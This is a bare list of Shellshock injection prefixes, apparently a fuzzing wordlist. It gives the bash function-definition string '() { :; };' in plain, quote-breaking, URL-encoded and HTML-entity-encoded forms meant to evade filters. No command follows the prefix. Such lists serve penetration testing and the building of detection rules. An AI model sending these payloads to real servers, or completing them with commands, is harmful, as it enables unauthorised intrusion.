() { :; };
&#x7d;&#x3b;
%28%29%20%7b%20%3a%3b%20%7d%3b
&#x28;&#x29;
&#x7b;&#x20;&#x3a;&#x3b;&#x20;&#x7d;&#x3b;
&#x28;&#x29;&#x20;&#x7b;&#x20;&#x3a;&#x3b;&#x20;&#x7d;&#x3b;
&#x25;&#x37;&#x62;&#x25;&#x32;&#x30;&#x25;&#x33;&#x61;&#x25;&#x33;&#x62;&#x25;&#x32;&#x30;&#x25;&#x37;&#x64;

\"" "() { :; }
%5c%22%22
&#x5c;&#x22;&#x22;&#x20;&#x22;&#x28;&#x29;&#x20;&#x7b;&#x20;&#x3a;&#x3b;&#x20;&#x7d;
%5c%22%22%20%22%28%29%20%7b%20%3a%3b%20%7d

\"" "() { :; };
%5c%22%22%20%22%28%29
%5c%22%22%20%22%28%29%20%7b%20%3a%3b%20%7d%3b
&#x5c;&#x22;&#x22;&#x20;&#x22;&#x28;&#x29;&#x20;&#x7b;&#x20;&#x3a;&#x3b;&#x20;&#x7d;&#x3b;

